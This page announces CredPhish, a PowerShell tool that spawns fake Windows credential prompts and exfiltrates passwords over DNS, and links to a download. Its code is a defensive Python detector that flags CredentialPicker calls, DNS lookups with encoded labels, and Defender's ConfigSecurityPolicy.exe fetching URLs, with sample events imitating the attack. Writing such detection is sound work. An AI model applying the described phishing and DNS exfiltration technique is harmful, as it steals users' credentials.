CredPhish – A PowerShell Script Designed To Invoke Legitimate Credential Prompts And Exfiltrate Passwords Over DNS


CredPhish is a PowerShell script designed to invoke credential prompts and exfiltrate passwords. It relies on CredentialPicker to collect user passwords, Resolve-DnsName for DNS exfiltration, and Windows Defender’s ConfigSecurityPolicy.exe to perform arbitrary GET requests.

For a walkthrough, see the Black Hills Infosec publication.
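With process-creation and PowerShell script block logging enabled, each of the three components named above shows up in endpoint telemetry. The following Python is an added example, not code from CredPhish or the Black Hills Infosec walkthrough; it correlates those traces per host over constructed events, and the event field names and the encoded-label heuristic are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample events. Field names are assumptions modelled on exported
# process-creation (Sysmon 1) and script block (PowerShell 4104) records.
SAMPLE_EVENTS = [
    {"host": "WS01", "event_id": 1,
     "image": r"C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe",
     "command_line": r'"C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe" http://example.test/a?b=c'},
    {"host": "WS01", "event_id": 4104,
     "script_block": "[Windows.Security.Credentials.UI.CredentialPicker]::PickAsync($options)"},
    {"host": "WS01", "event_id": 4104,
     "script_block": "Resolve-DnsName -Name 6578616d706c6564617461.example.test -Type A"},
    {"host": "WS02", "event_id": 4104,
     "script_block": "Resolve-DnsName -Name intranet.example.test"},
    {"host": "WS02", "event_id": 1,
     "image": r"C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe",
     "command_line": r"ConfigSecurityPolicy.exe C:\policy\defender.xml"},
]

URL_RE = re.compile(r"https?://\S+", re.I)
DNS_RE = re.compile(r"Resolve-DnsName\s+(?:-Name\s+)?([^\s;|)]+)", re.I)
# Assumed heuristic: a DNS label that is long hex or long base64-like text.
ENCODED_LABEL_RE = re.compile(r"^(?:[0-9a-f]{16,}|[A-Za-z0-9+/=_-]{32,})$", re.I)

def classify(event):
    """Return the indicator name for one event, or None if it is unremarkable."""
    if event["event_id"] == 1:
        exe = event["image"].replace("\\", "/").rsplit("/", 1)[-1].lower()
        if exe == "configsecuritypolicy.exe" and URL_RE.search(event["command_line"]):
            return "defender_binary_url"
    elif event["event_id"] == 4104:
        block = event["script_block"]
        if "credentialpicker" in block.lower():
            return "credential_prompt"
        m = DNS_RE.search(block)
        labels = m.group(1).strip("'\"").split(".") if m else []
        if any(ENCODED_LABEL_RE.match(label) for label in labels):
            return "dns_encoded_label"
    return None

def correlate(events):
    """Map host -> sorted indicators, keeping hosts with two or more distinct ones."""
    seen = defaultdict(set)
    for event in events:
        hit = classify(event)
        if hit:
            seen[event["host"]].add(hit)
    return {host: sorted(hits) for host, hits in seen.items() if len(hits) >= 2}
```

Any single indicator can be benign on its own, which is why the alert is keyed on two or more distinct indicators from the same host.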

Download CredPhish


Original Source